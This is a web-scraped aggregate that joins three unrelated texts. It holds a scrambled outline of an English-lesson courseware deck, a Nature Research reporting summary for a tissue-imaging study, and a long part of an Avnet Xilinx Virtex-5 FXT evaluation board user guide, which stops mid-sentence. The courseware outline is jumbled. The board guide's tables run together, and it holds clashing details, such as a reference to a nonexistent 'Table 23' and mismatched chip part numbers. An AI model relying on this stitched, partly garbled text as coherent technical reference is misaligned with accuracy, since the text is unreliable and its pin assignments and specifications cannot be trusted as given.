26

外研版八年级英语上M5U2课件

外研版八年级英语上M5U2课件

02
Vocabulary learning and expansion
Key vocabulary explanation
Key words and phrases
Introduce and explain important words and phrases in the unit, including their meanings, usage, and example sentences.
01
Mnemonic devices
Introduce mnemonic devices such as acronyms, rhymes, or visual aids to help students remember new words more easily.
02 03
Association methods
Supplementary materials
Additional resources such as worksheets, audio recordings, and videos will be provided to support the textbook and enhance student learning.
目录
• Grammar knowledge sorting and application • Listening training and improvement • Oral expression and communication ability
cultivation
01
Course Introduction and Objectives
Word formation

Nature Research Reporting Summary说明书

Nature Research Reporting Summary说明书

October 2018Corresponding author(s):Sinem K. Saka, Yu Wang, Peng YinLast updated by author(s):June 05, 2019Reporting SummaryNature Research wishes to improve the reproducibility of the work that we publish. This form provides structure for consistency and transparency in reporting. For further information on Nature Research policies, see Authors & Referees and the Editorial Policy Checklist .StatisticsFor all statistical analyses, confirm that the following items are present in the figure legend, table legend, main text, or Methods section.The exact sample size (n ) for each experimental group/condition, given as a discrete number and unit of measurement A statement on whether measurements were taken from distinct samples or whether the same sample was measured repeatedlyThe statistical test(s) used AND whether they are one- or two-sided Only common tests should be described solely by name; describe more complex techniques in the Methods section.A description of all covariates tested A description of any assumptions or corrections, such as tests of normality and adjustment for multiple comparisons A full description of the statistical parameters including central tendency (e.g. means) or other basic estimates (e.g. regression coefficient) AND variation (e.g. standard deviation) or associated estimates of uncertainty (e.g. confidence intervals)For null hypothesis testing, the test statistic (e.g. F , t , r ) with confidence intervals, effect sizes, degrees of freedom and P value notedGive P values as exact values whenever suitable.For Bayesian analysis, information on the choice of priors and Markov chain Monte Carlo settingsFor hierarchical and complex designs, identification of the appropriate level for tests and full reporting of outcomesEstimates of effect sizes (e.g. Cohen's d , Pearson's r ), indicating how they were calculatedOur web collection on statistics for biologists contains articles on many of the points above.Software and codePolicy information about availability of computer codeData collection Commercial softwares licensed by microscopy companies were utilized: Zeiss Zen 2012 (for LSM 710), Leica LAS AF (for Leica SP5), ZeissZen 2.3 Pro Blue edition (for LZeiss Axio Observer Z1), Olympus VS-ASW (for Olympus VS120), PerkinElmer Phenochart (version 1.0.2) .Data analysis Open-source Python (3.6.5), TensorFlow (1.12.0), and Deep Learning packages have been utilized for machine learning-based nucleiidentification (the algorithm and code is available at https:///HMS-IDAC/UNet). We used Matlab (2017b) for watershed-based nuclear segmentation using the identified nuclear contours. Python 3.6 was used for the FWHM calculations, as well as plotting ofhistograms. We used MATLAB and the Image Processing Toolbox R2016a (The MathWorks, Inc., Natick, Massachusetts, United States)for quantifications in mouse retina sections and for Supplementary Fig. 4. We utilized Cell Profiler 3.1.5 for the quantifications of signalamplification in FFPE samples in Figure 2 and 3. FIJI (version 2.0.0-rc-69/1.52n) was utilized for ROI selections and format conversions.HMS OMERO (version 5.4.6.21) was used for viewing images and assembling figure panels.For manuscripts utilizing custom algorithms or software that are central to the research but not yet described in published literature, software must be made available to editors/reviewers. We strongly encourage code deposition in a community repository (e.g. GitHub). See the Nature Research guidelines for submitting code & software for further information.DataPolicy information about availability of dataAll manuscripts must include a data availability statement . This statement should provide the following information, where applicable:- Accession codes, unique identifiers, or web links for publicly available datasets- A list of figures that have associated raw data- A description of any restrictions on data availabilityData and Software Availability: The data and essential custom scripts for image processing will be made available from the corresponding authors P.Y.(**************.edu),S.K.S.(***********************.edu),andY.W.(********************.edu)uponrequest.Thedeeplearningalgorithmandtestdataset for automated identification of nuclear contours in tonsil tissues is available on https:///HMS-IDAC/UNet . The MATLAB code for nuclear segmentation isOctober 2018available on: https:///HMS-IDAC/SABERProbMapSegmentation .Field-specific reportingPlease select the one below that is the best fit for your research. If you are not sure, read the appropriate sections before making your selection.Life sciencesBehavioural & social sciences Ecological, evolutionary & environmental sciencesFor a reference copy of the document with all sections, see /documents/nr-reporting-summary-flat.pdfLife sciences study design All studies must disclose on these points even when the disclosure is negative.Sample size Each FFPE experiment batch were performed on consecutive sections from the same source, each containing over 600,000 cells. Due to largenumber of single cells with tens of distinct germinal center morphologies being present in each section, ROIs from different parts of a wholesection was used for quantification of signal improvement for each condition (consecutive sections were used for all the conditions of onequantification experiment). Number of ROIs are noted in the respective figure legends. For quantifications in retina samples, due toconserved staining morphology and low sample-to-sample variability n = 6 z-stacks were acquired from at least 2 retina sections. ForSupplementary Fig. 4, minimum 5 z-stacks were acquired for each condition to collect images of 18-45 cells. Number of cells are reported in the graphs.Data exclusions Parts of the FFPE tissue sections were excluded from analysis due to automated imaging related aberrations (out-of-focus areas) or tissuepreparation aberrations (folding of the thin sections at the edges, or uneven thickness at the edge areas). For FWHM calculations inSupplementary Fig. 2, ROIs that yield lineplots with more than one automatically detected peak were discarded to avoid deviations due tomultiple peaks. For Supplementary Fig. 4 cells in the samples were excluded when an external bright fluorescent particle (dust speck, dye aggregate etc.) coincided with the nuclei (as confirmed by manual inspection of the images). The exclusion criteria were pre-established.Replication Each FFPE experiment batch were performed on consecutive sections from the same source, each containing over 600,000 cells. Forevaluation and quantification of our method, multiple biological replicates were not accumulated in order to avoid the error that would beintroduced by the natural biological and preparation variation, and to avoid unnecessary use of human tissue material. In the case of themouse retina quantifications a minimum of two distinct retinal sections were imaged, and each experiment was performed at least twice. ForSupplementary Fig. 4 dataset, 16 different conditions were prepared and each were imaged multiple times (before linear, after linear, beforebranch, after branch). Although the data was not pooled together for the statistics reported in the figure, low cell-to-cell variability was observed and high consistency was seen across the samples for comparable conditions, suggesting low sample to sample variability.Randomization Randomization was not necessary for this study.Blinding Blinding was not possible as experimental conditions were mostly evident from the image data.Reporting for specific materials, systems and methodsWe require information from authors about some types of materials, experimental systems and methods used in many studies. Here, indicate whether each material, system or method listed is relevant to your study. If you are not sure if a list item applies to your research, read the appropriate section before selecting a response.AntibodiesAntibodies used The full list is also available in Supplementary Information, Supplementary Table 4.Ki-67 Cell Signaling #9129, clone: D3B5 (formulated in PBS, Lot: 2), diluted 1:100-1:250 after conjugationCD8a Cell Signaling #85336 clone: D8A8Y (formulated in PBS, Lot: 4) diluted 1:150 after conjugationPD-1 Cell Signaling #43248, clone: EH33 (formulated in PBS, Lot: 2), diluted 1:150 after conjugationIgA Jackson ImmunoResearch #109-005-011 (Lot: 134868), diluted 1:150 after conjugationCD3e Cell Signaling #85061 clone: D7A6E(TM) XP(R) (formulated in PBS, Lot:2), diluted 1:150 after conjugationIgM Jackson ImmunoResearch #709-006-073 (Lot: 133627), diluted 1:150 after conjugationLamin B Santa Cruz sc-6216 clone:C-20, (Lot: E1115), diluted 1:100Alpha-Tubulin ThermoFisher #MA1-80017 (multiple lots), diluted 1:50 after conjugationCone arrestin Millipore #AB15282 (Lot: 2712407), diluted 1:100 after conjugationGFAP ThermoFisher #13-0300 (Lot: rh241999), diluted 1:50 after conjugationSV2 HybridomaBank, Antibody Registry ID: AB_2315387, in house production, diluted 1:25 after conjugationPKCα Novus #NB600-201, diluted 1:50 after conjugationCollagen IV Novus #NB120-6586, diluted 1:50 after conjugationRhodopsin EnCor Bio #MCA-A531, diluted 1:50 after conjugationCalbindin EnCor Bio #MCA-5A9, diluted 1:25 after conjugationVimentin Cell Signaling #5741S, diluted 1:50 after conjugationCalretinin EnCor Bio #MCA3G9, diluted 1:50 after conjugationVLP1 EnCor Bio #MCA-2D11, diluted 1:25 after conjugationBassoon Enzo ADI-VAM-#PS003, diluted 1:500Homer1b/c ThermoFisher #PA5-21487, diluted 1:250SupplementaryAnti-rabbit IgG (to detect Ki-67 and Homer1b/c indirectly) Jackson ImmunoResearch # 711-005-152 (Multiple lots), 1:90 afterconjugationAnti-mouse IgG (to detect Bassoon indirectly) Jackson ImmunoResearch #715-005-151) (Multiple lots), diluted 1:100 afterconjugationAnti-goat IgG (to detect Lamin B indirectly) Jackson ImmunoResearch # 705-005-147) (Lot: 125860), diluted 1:75 afterconjugationAlternative antibodies used to validate colocalization of VLP1 and Calretinin in Supplementary Fig. 8d-f:Calretinin (SantaCruz #SC-365956; EnCor Bio #CPCA-Calret; EnCor Bio #MCA-3G9 AP), VLP1 (EnCor Bio #RPCA-VLP1; EnCor Bio#CPCA-VLP1; EnCor Bio #MCA-2D11). All diluted 1:100.Fluorophore-conjugated secondary antibodies used for reference imaging:anti-rat-Alexa647 (ThermoFisher #A-21472, 1:200), anti-rabbit-Alexa488 (ThermoFisher #A-21206, 1:200), anti-rabbit-Atto488(Rockland #611-152-122S, Lot:33901, 1:500), anti-mouse-Alexa647 (ThermoFisher #A-31571, 1:400), anti-goat-Alexa647(ThermoFisher # A-21447, 1:200), anti-rabbit-Alexa647 (Jackson ImmunoResearch, 711-605-152, Lot: 125197, 1:300).Validation All antibodies used are from commercial sources as described. Only antibodies that have been validated by the vendor with in vitro and in situ experiments (for IHC and IF, with images available on the websites) and/or heavily used by the community withpublication in several references were used. The validation and references for each are publicly available on the respectivevendor websites that can reached via the catalog numbers listed above. In our experiments, IF patterns matched the distributionof cell types these antibodies were expected to label based on the literature both before and after conjugation with DNA strands. Eukaryotic cell linesPolicy information about cell linesCell line source(s)BS-C-1 cells and HeLa cellsAuthentication Cell lines were not authenticated (not relevant for the experiment or results)Mycoplasma contamination Cell lines were not tested for mycoplasma contamination (not relevant for the experiment or results)Commonly misidentified lines (See ICLAC register)No commonly misidentified cell lines were used.October 2018Animals and other organismsPolicy information about studies involving animals; ARRIVE guidelines recommended for reporting animal researchLaboratory animals Wild-type CD1 mice (male and female) age P13 or P17 were used for retina harvest.Wild animals The study did not involve wild animals.Field-collected samples The study did not involve samples collected from the field.Ethics oversight All animal procedures were in accordance with the National Institute for Laboratory Animal Research Guide for the Care and Useof Laboratory Animals and approved by the Harvard Medical School Committee on Animal Care.Note that full information on the approval of the study protocol must also be provided in the manuscript.Human research participantsPolicy information about studies involving human research participantsPopulation characteristics We have only used exempt tissue sections for technical demonstration, since we do not derive any biological conclusions, thepopulation characteristics is not relevant for this methodological study.Recruitment Not relevant for this study.Ethics oversight Human specimens were retrieved from the archives of the Pathology Department of Beth Israel Deaconess Medical Centerunder the discarded/excess tissue protocol as approved in Institutional Review Board (IRB) Protocol #2017P000585. Informedinform consent was waived on the basis of minimal risk to participants (which is indirect and not based on prospectiveparticipation by patients).Note that full information on the approval of the study protocol must also be provided in the manuscript.October 2018。

Xilinx手册

Xilinx手册

Xilinx® Virtex™-5 FXT Evaluation KitUser GuideTable of Contents1.0Introduction (4)1.1Description (4)1.2Board Features (4)1.3Test Files (4)1.4Reference Designs (5)1.5Ordering Information (5)2.0Functional Description (6)2.1Xilinx Virtex-5 FX30T FPGA (6)2.2Memory (6)2.2.1DDR2 SDRAM Interface (7)2.2.2Flash Memory (10)2.3Clock Sources (10)2.4Communication (12)2.4.1.110/100/1000 Ethernet PHY (12)2.4.1.2Universal Serial Bus (USB) to UART Bridge Transceiver (14)2.4.1.3RS232 (14)2.5User Switches (15)2.6User LEDs (16)2.7Configuration and Debug Ports (16)2.7.1Configuration Modes (16)2.7.2System ACE™ Module Connector (17)2.7.3JTAG Port (PC4) (18)2.7.4CPU Debug Port (19)2.7.5CPU Trace Port (19)2.8Power (20)2.8.1FPGA I/O Voltage (Vcco) (20)2.8.2FPGA Reference Voltage (Vref) (21)2.9Expansion Connectors (21)2.9.1EXP Interface (21)3.0Test Designs (24)3.1Factory Test (24)3.2Ethernet Test (24)3.3USB UART Test (24)4.0Revisions (25)Appendix A (26)FiguresFigure 1 - Virtex-5 FXT Evaluation Board Picture (5)Figure 2 - Virtex-5 FXT Evaluation Board Block Diagram (6)Figure 3 - Virtex-5 FXT Evaluation Board Memory Interfaces (7)Figure 4 - DDR2 SDRAM Interface (7)Figure 5 - Clock Nets Connected to Global Clock Inputs (11)Figure 6 - 10/100/1000 Mb/s Ethernet Interface (12)Figure 7 - USB to UART Transceiver Interface (14)Figure 8 - RS232 Interface (15)Figure 9 - SAM Interface (50-pin header) (17)Figure 10 - PC4 JTAG Port Connector (18)Figure 11 - CPU Debug Connector (19)Figure 12 - CPU Trace Connector (19)Figure 13 – Virtex-5 FXT Evaluation Board Power (20)Figure 14 - EXP I/O Voltage Jumpers (21)Figure 15 - Virtex-5 FXT Evaluation Board Placement (26)TablesTable 1 - Ordering Information (5)Table 2 - XC5FX30T Features (6)Table 3 - DDR2 SDRAM Timing Parameters (8)Table 4 - Virtex-5 FXT DDR2 FPGA Pinouts (9)Table 5 - Virtex-5 Flash Memory Pinout (10)Table 6 - On-Board Clock Sources (11)Table 7 - Clock Socket "U12" Pin-out (11)Table 8 - User Clock Input (12)Table 9 - Ethernet PHY Hardware Strapping Options (13)Table 10 - Ethernet PHY Pin Assignments (14)Table 11 - USB to UART Interface FPGA Pin-out (14)Table 12 - RS232 Signals (15)Table 13 - Push-Button Pin Assignments (15)Table 14 - DIP Switch Pin Assignments (16)Table 15 - LED Pin Assignments (16)Table 16 - FPGA Configuration Modes (16)Table 17 - SAM Interface Signals (18)Table 18 - V5FX30T I/O Bank Voltages (20)Table 19 - EXP Connector Signals (22)Table 20 - EXP Connector "JX1" Pin-out (23)1.0 IntroductionThe purpose of this manual is to describe the functionality and contents of the Virtex-5 FXT Evaluation Kit from Avnet Electronics Marketing. This document includes instructions for operating the board, descriptions of the hardware features and explanations of the test code programmed in the on-board flash.1.1 DescriptionThe Virtex-5 FXT Evaluation Kit provides a complete hardware environment for designers to accelerate their time to market.The kit delivers a stable platform to develop and test designs targeted to the advanced Xilinx FPGA family. The installed Virtex-5 FX30T device offers a prototyping environment to effectively demonstrate the enhanced benefits of leading edge Xilinx FPGA solutions. Reference designs are included with the kit to exercise standard peripherals on the development board for a quick start to device familiarization.Features1.2 BoardFPGA— Xilinx Virtex-5 XC5VFX30T-FF665 FPGAI/O Connectors— One EXP general-purpose I/O expansion connectors— One 50-pin 0.1” Header supports Avnet System ACE Module (SAM)— 16-pin 0.1” CPU debug header— Mictor CPU Trace Port— User Clock Inputs via Differential SMA ConnectorsMemory— 64 MB DDR2 SDRAM— 16 MB FLASHCommunication— RS-232 serial port— USB-RS232 Port— 10/100/1000 Ethernet PHYPower— Regulated 3.3V, 2.5V, and 1.0V supply voltages derived from an external 5V supply— DDR2 termination (0.9V) and supply/reference voltage (1.8V) regulator.Configuration— Xilinx Parallel Cable IV or Platform USB Cable support for JTAG Programming/Configuration— 16MB Intel BPI FlashFiles1.3 TestThe flash memory on the Virtex-5 FX30T Evaluation Board comes programmed with a factory test design that can be used as base tests for some of the peripherals on the board. The test designs listed below are discussed in Section 3.0. The factory test will test the following interfaces/peripherals:— DDR2 memory— Flash memory— User LEDs— User push-buttonsOther factory test designs for testing the Ethernet and USB-RS232 interfaces are available on the Avnet Design Resource Center web site (/drc).1.4 ReferenceDesignsReference designs that demonstrate some of the potential applications of the board can be downloaded from the Avnet Design Resource Center (/drc). The reference designs include all of the source code and project files necessary to implement the designs. See the PDF document included with each reference design for a complete description of the design and detailed instructions for running a demonstration on the evaluation board. Check the DRC periodically for updates and new designs.Figure 1 - Virtex-5 FXT Evaluation Board Picture1.5 OrderingInformationThe following table lists the development kit part number.Internet link at /drcPart Number HardwareAES-V5FXT-EVL30-G Xilinx Virtex-5 FXT Kit populated with an XC5VFX30T-1 speed grade deviceTable 1 - Ordering Information2.0 Functional DescriptionA high-level block diagram of the Virtex-5 FXT Evaluation board is shown below followed by a brief description of each sub-section.Figure 2 - Virtex-5 FXT Evaluation Board Block Diagram2.1 Xilinx Virtex-5 FX30T FPGAThe Virtex-5 FX30T FPGA features 4 DCMs, 2 PLLs, and 1.25 Gbps LVDS I/O. The following table shows some other main features of the FF676 package.Device Number ofSlices BlockRAM(Kb)DSP48ESlicesXC5VFX30T 5,120 2,448 64Table 2 - XC5FX30T FeaturesPlease refer to the Virtex-5 FX30T Data sheet for a complete detailed summary of all device features.324 of the 360 available I/O on the Virtex-5 FX30T device are used in the design.2.2 MemoryThe Virtex-5 FXT Evaluation Board is populated with both high-speed RAM and non-volatile Flash to support various types of applications. The board has 64 Megabytes (MB) of DDR2 SDRAM and 16 MB of Flash. The following figure shows a high-level block diagram of the memory interfaces on the evaluation board. If additional memory is necessary for development, check the Avnet Design Resource Center (DRC) for the availability of EXP compliant daughter cards with expansion memory (sold separately). Here is the link to the DRC web page: /drc.Figure 3 - Virtex-5 FXT Evaluation Board Memory Interfaces2.2.1 DDR2 SDRAM InterfaceTwo Micron DDR2 SDRAM devices, part number MT47H16M16BG-5E, make up the 32-bit data bus. Each device provides 32MB of memory on a single IC and is organized as 4 Megabits x 16 x 4 banks (256 Megabit). The device has an operating voltage of 1.8V and the interface is JEDEC Standard SSTL_2 (Class I for unidirectional signals, Class II for bidirectional signals). The -5E speed grade supports 5 ns cycle times with a 3 clock read latency (DDR2-400). DDR2 On-Die-Termination (ODT) is also supported. The following figure shows a high-level block diagram of the DDR SDRAM interface on the Virtex-5 FXT Evaluation Board.Figure 4 - DDR2 SDRAM InterfaceThe following table provides timing and other information about the Micron device necessary to implement a DDR2 memory controller.MT47H16M16BG-5E: Timing Parameters Time (ps) orNumberLoad Mode Register time (TMRD) 25000Write Recovery time (TWR) 15000Write-to-Read Command Delay (TWTR) 1Delay between ACT and PRE Commands (TRAS) 90000Delay after ACT before another ACT (TRC) 65000Delay after AUTOREFRESH Command (TRFC) 115000Delay after ACT before READ/WRITE (TRCD) 25000Delay after ACT before another row ACT (TRRD) 15000Delay after PRECHARGE Command (TRP) 20000Refresh Command Interval (TREFC) 115000Avg. Refresh Period (TREFI) 7800000Memory Data Width (DWIDTH) (x2 devices) 32Row Address Width (AWIDTH) 13Column Address Width (COL_AWIDTH) 9Bank Address Width (BANK_AWIDTH) 2Memory Range (64 MB total) 0x3FFFFFFTable 3 - DDR2 SDRAM Timing ParametersThe following guidelines were used in the design of the DDR2 interface to the Virtex-5 FX30T FPGA. These guidelines are based on Micron recommendations and board level simulation.•Dedicated bus with matched trace lengths (+/- 100 mils)•Memory clocks routed differentially•50 ohm* controlled trace impedance•Series termination on bidirectional signals at the memory device•Parallel termination following the memory device connection on all signals•100 ohm* pull-up resistor to the termination supply on each branch of shared signals (control, address)•Termination supply that can source both termination and reference voltages.* Ideal impedance values. Actual may vary.Some of the design considerations were specific to the Virtex-5 architecture. For example, the data strobe signals (DQS) were placed on Clock Capable I/O pins in order to support data capture techniques utilizing the SERDES function of the Virtex-5 I/O blocks. The appropriate DDR2 memory signals were placed in the clock regions that correspond to these particular Clock Capable I/O pins.The DDR2 signals are connected to I/O Banks 11 and 13 of the Virtex-5 FX30T FPGA. The output supply pins (VCCO) for Banks 11 and 13 are connected to 1.8 Volts. This supply rail can be measured at test point TP5, which can be found in the area around the power modules. The reference voltage pins (VREF) for Banks 11 and 13 are connected to the reference output of the Texas Instruments TPS51116 DDR2 Power Solution Regulator. This rail provides the voltage reference necessary for the SSTL_2 I/O standard as well as the termination supply rail. The termination voltage is 0.9 Volts and can be measured at test point TP6.The following table contains the FPGA pin numbers for the DDR2 SDRAM interface.Signal Name Virtex-5 pin Signal Name Virtex-5 pinDDR_A0 U25 DDR_D0 R22DDR_A1 T25 DDR_D1 R23DDR_A2 T24 DDR_D2 P23DDR_A3 T23 DDR_D3 P24DDR_A4 U24 DDR_D4 R25DDR_A5 V24 DDR_D5 P25DDR_A6 Y23 DDR_D6 R26DDR_A7 W23 DDR_D7 P26DDR_A8 AA25 DDR_D8 M26DDR_A9 AB26 DDR_D9 N26DDR_A10 AB25 DDR_D10 K25DDR_A11 AB24 DDR_D11 L24DDR_A12 AA23 DDR_D12 K26DDR_D13J26J25 DDR_D14DDR_BA0 U21 DDR_D15 N21DDR_BA1 V22M21 DDR_D16DDR_CS# AD24 DDR_D17 J23ODT AF24 DDR_D18 H23H22 DDR_D19DDR_WE# AA22 DDR_D20 G22DDR_RAS# Y22 DDR_D21 F22DDR_CAS# W24 DDR_D22 F23DDR_CLKEN T22 DDR_D23 E23G24DM0 U26 DDR_D24F24DM1 N24 DDR_D25G25DM2 M24 DDR_D26DM3 M25 DDR_D27H26G26 DDR_D28DQS0 P,N W26, W25 DDR_D29 F25DQS1 P,N L23, L22 DDR_D30 E25DQS2 P,N K22, K23 DDR_D31 E26DDR2_CLK0 P,N V21, W21DDR2_CLK1 P,N N22, M22Table 4 - Virtex-5 FXT DDR2 FPGA PinoutsMemory2.2.2 FlashThe Virtex-5 FXT Evaluation Board has 16 MB of non-volatile flash memory on board. The flash device is made by Intel,part number: PC28F128P30T85. The flash memory interface utilizes a 16-bit data bus and can be accessed directly without any external hardware settings or jumpers. See the following table for the flash memory to Virtex-5 pinout.Signal Name Virtex-5 Pin Signal Name Virtex-5 PinFLASH_A0 Y11 FLASH_D0 AA15FLASH_A1 H9 FLASH_D1 Y15FLASH_A2 G10 FLASH_D2 W14FLASH_A3 H21 FLASH_D3 Y13FLASH_A4 G20 FLASH_D4 W16FLASH_A5 H11 FLASH_D5 Y16FLASH_A6 G11 FLASH_D6 AA14FLASH_A7 H19 FLASH_D7 AA13FLASH_A8 H18 FLASH_D8 AB12FLASH_A9 G12 FLASH_D9 AC11FLASH_A10 F13 FLASH_D10 AB20FLASH_A11 G19 FLASH_D11 AB21FLASH_A12 F18 FLASH_D12 AB11FLASH_A13 F14 FLASH_D13 AB10FLASH_A14 F15 FLASH_D14 AA20FLASH_A15 F17 FLASH_D15 Y21FLASH_A16 G17FLASH_A17 G14 FLASH_CE# Y12FLASH_A18 H13 FLASH_OE# AA12FLASH_A19 G16 FLASH_WE# AA17FLASH_A20 G15 FLASH_RST# D13FLASH_A21 Y18 FLASH_BYTE# Y17FLASH_A22 AA18 FLASH_WAIT# D16FLASH_A23 Y10 FLASH_ADV# F19FLASH_A24 W11Table 5 - Virtex-5 Flash Memory PinoutSources2.3 ClockThe Virtex-5 FXT Evaluation Board includes all of the necessary clocks on the board to implement designs as well as providing the flexibility for the user to supply their own application specific clocks. The clock sources described in this section are used to derive the required clocks for the memory and communications devices, and the general system clocks for the logic design. This section also provides information on how to supply external user clocks to the FPGA via the on-board connectors and oscillator socket.The following figure shows the clock nets connected to the I/O banks containing the global clock input pins on the Virtex-5 FX30T FPGA. Ten out of the twenty global clock inputs of the Virtex-5 FPGA are utilized on the board as clock resources. The other global clock inputs are used for user I/O. It should be noted that single-ended clock inputs must be connected to the P-side of the pin pair because a direct connection to the global clock tree only exists on this pin. The I/O voltage (VCCO) for Bank 3 is set at 3.3V. Bank 4 is jumper selectable via JP2 to either 2.5V or 3.3V. In order to use the differential clock inputs as LVDS inputs, the VCCO voltage for the corresponding bank must be set for 2.5V since the Virtex-5 FPGA does not support 3.3V differential signaling. Single-ended clock inputs do not have this restriction and may be either 2.5V or 3.3V. The interface clocks and other I/O signals coming from 3.3V devices on the board are level-shifted to the appropriate VCCO voltage by CB3T standard logic devices prior to the Virtex-5 input pins.Figure 5 - Clock Nets Connected to Global Clock InputsThe on-board 100MHz oscillator provides the system clock input to the global clock tree. This single-ended, 100 MHz clock can be used in conjunction with the Virtex-5 Digital Clock Managers (DCMs) to generate the various processor clocks and the clocks forwarded to the DDR SDRAM devices. The interface clocks supplied by the communications devices are derived from dedicated crystal oscillators.Reference# Frequency Derived InterfaceClock Derived Frequency Virtex-5 pin#U11 100 MHz CLK_100MHZ 100 MHz E18 U12 (sckt) User defined User Defined User Defined E13 J2, J5User DefinedUser Defined User Defined AB15. AB16GMII_RX_CLK E20GMII_TX_CLK 2.5, 25, 125 MHzE17 Y125 MHz GBE_MCLK 125 MHz F20Table 6 - On-Board Clock SourcesThe clock socket is an 8-pin DIP clock socket that allows the user to select an oscillator of choice. The socket is a single-ended, LVTTL or LVCMOS compatible clock input to the FPGA that can be used as an alternate source for the system clock.Signal Name Socket pin#Enable 1 GND 4 Output 5 VDD 8 Table 7 - Clock Socket "U12" Pin-outNet Name Input Type Connector.pin# Virtex-5 pin#clock U16.5 E13CLK_SOCKET GlobalTable 8 - User Clock Input2.4 CommunicationThe Virtex-5 FX30T FPGA has access to Ethernet and RS232 physical layer transceivers for communication purposes. Network access is provided by a 10/100/1000 Mb/s Ethernet PHY, which is connected to the Virtex-5 via a standard GMII interface. The PHY connects to the outside world with a standard RJ45 connector (J1) and is located in the upper right corner of the board.A USB compatible RS232 transceiver is available for use as well. The USB Type B peripheral connector (JR1) is mounted on the top right corner of the board. A second, standard DB9 Serial port (P1) to the embedded processor or FPGA fabric is provided through a dual-channel RS232 transceiver.2.4.1 10/100/1000 Ethernet PHYThe PHY is a National DP83865DVH Gig PHYTER® V. The DP83865 is a low power version of National’s Gig PHYTER V with a 1.8V core voltage and 3.3V I/O voltage. The PHY also supports 2.5V I/O, but the 2.5V option is used on the board. The PHY is connected to a Tyco RJ-45 jack with integrated magnetics (part number: 1-6605833-1). The jack also integrates two LEDs and their corresponding resistors as well as several other passive components. External logic is used to logically OR the three link indicators for 10, 100 and 1000 Mb/s to drive a Link LED on the RJ-45 jack. The external logic is for the default strap options and may not work if the strap options are changed. Four more LEDs are provided on the board for status indication. These LEDs indicate lnk at 10 Mb/s, link at 100 Mb/s, link at 1000 Mb/s and Full Duplex operation. The PHY clock is generated from its own 25 MHz crystal. The following figure shows a high-level block diagram of the interface to the DP83865 Tri-mode Ethernet PHY.Figure 6 - 10/100/1000 Mb/s Ethernet InterfaceThe PHY address is set to 0b00001 by default. PHY address 0b00000 is reserved for a test mode and should not be used. Three-pad resistor jumpers are used to set the strapping options. These jumper pads provide the user with the ability to change the settings by moving the resistors. The strapping options are shown in the following table. The dual-function pins that are used for both a strapping option and to drive an LED, have a set of two jumpers per pin. The dual-function pins are indicated by an asterisk in the table.Function Jumper InstallationResistorMode EnabledJT4: pins 1-2 JT5: pins 1-2 0 ohm 0 ohm Auto-negotiation enabled (default) Auto-Negotiation*JT4: pins 2-3 JT5: pins 2-3 0 ohm 0 ohm Auto-negotiation disabled JT8: pins 1-2 JT9: pins 1-2 0 ohm 0 ohm Full Duplex (default) Full/Half Duplex*JT8: pins 2-3 JT9: pins 2-30 ohm 0 ohm Half DuplexSpeed 1*JT1: pins 1-2 JT2: pins 1-20 ohm 0 ohmSpeed 0*JT1: pins 1-2 JT2: pins 1-20 ohm 0 ohm Speed Selection: (Auto-Neg enabled) Speed1 Speed0 Speed Advertised1 1 1000BASE-T, 10BASE-T 1 0 1000BASE-T0 1 1000BASE-T, 100BASE-TX0 0 1000BASE-T, 100BASE-TX, 10BASE-TDefault: 1000BASE-T, 100BASE-TX, 10BASE-T JT9: pins 1-2 JT10: pins 1-2 0 ohm 0 ohm PHY Address 0b00001 (default) PHY address 0*JT9: pins 2-3 JT10: pins 2-3 0 ohm 0 ohm PHY Address 0b00000JT6: pins 1-2 Compliant and Non-comp. Operation (default) Non-IEEE Compliant Mode JT6: pins 2-3 1 K 1 K Inhibits Non-compliant operation JT10: pins 1-2 Straight Mode (default) Manual MDIX Setting JT10 pins 2-3 1 K 1 K Cross-over ModeJT11: pins 1-2 Automatic Pair Swap – MDIX (default)Auto MDIX Enable J11: pins 2-3 1 K 1 K Set to manual preset – Manual MDIX Setting (JT12) JT7: pins 1-2 Single node – NIC (default)Multiple Node Enable JT7: pins 2-3 1 K 1 K Multiple node priority – switch/hubJT3: pins 1-2 CLK_TO_MAC output enabled (default) Clock to MAC EnableJT3: pins 2-31 K 1 KCLK_TO_MAC output disabledTable 9 - Ethernet PHY Hardware Strapping OptionsThe default options as indicated in Table 23 are Auto-Negotiation enabled, Full Duplex mode, speed advertised as 10/100/1000 Mb/s, PHY address 0b00001, IEEE Compliant and Non-compliant support, straight cable in non-MDIX mode, auto-MDIX mode enabled, Single node (NIC) and CLK_TO_MAC enabled. The pin-out for a jumper pad is shown below.The auto-MDIX mode provides automatic swapping of the differential pairs. This allows the PHY to work with either a straight-through cable or crossover cable. Use a CAT-5e or CAT-6 Ethernet cable when operating at 1000 Mb/s (Gigabit Ethernet). The boundary-scan Test Access Port (TAP) controller of the DP83865 must be in reset for normal operation. This active low reset pin of the TAP (TRST) is pulled low through a 1K resistor on the board. The following table provides the Virtex-5 pin assignments for the Ethernet PHY interface.Net Name Virtex-5 pin Net Name Virtex-5 pin GBE_MDC D26 GBE_INT# C24 GBE_MDIO D25GBE_RST# B26 GBE_MCLK F20 GMII_CRS A25 GMII_GTC_CLK A19 GMII_COL A24 GMII_TXD0 D19 GMII_RXD0 D24 GMII_TXD1 C19 GMII_RXD1 D23 GMII_TXD2 A20 GMII_RXD2 D21 GMII_TXD3 B20 GMII_RXD3 C26 GMII_TXD4 B19 GMII_RXD4 D20 GMII_TXD5 A15 GMII_RXD5 C23 GMII_TXD6 B22 GMII_RXD6 B25 GMII_TXD7 B21 GMII_RXD7 C22 GMII_TX_EN A23 GMII_RX_DV C21 GMII_TX_ER A22 GMII_RX_ER B24 GMII_TX_CLK E17GMII_RX_CLK E20Table 10 - Ethernet PHY Pin Assignments2.4.2 Universal Serial Bus (USB) to UART Bridge TransceiverThe Virtex-5 FXT Evaluation Board utilizes a SiLabs CP2120 USB to UART transceiver to support PC’s that do not support the standard DB9 serial COM port. The diagram below shows how the CP2120 interfaces to the FPGA.CP2102USB ConnectorFigure 7 - USB to UART Transceiver InterfaceSignal Name Virtex-5 PinUSB_RS232_TXD AA19 USB_RS232_RXD AA10 USB_RS232_RST# Y20Table 11 - USB to UART Interface FPGA Pin-out2.4.3 RS232The RS232 transceiver is a 3222 available from Harris/Intersil (ICL3222CA) and Analog Devices (ADM3222). This transceiver operates at 3.3V with an internal charge pump to create the RS232 compatible output levels. This level converter supports two channels. The primary channel is used for transmit and receive data (TXD and RXD). The secondary channel may be connected to the FPGA by installing jumpers on “J3” and “J4” for use as CTS and RTS signals. The RS232 console interface is brought out on the DB9 connector labeled “P1”.Figure 8 - RS232 InterfaceA male-to-female serial cable should be used to plug “P1” into a standard PC serial port (male DB9). The following table shows the FPGA pin-out and 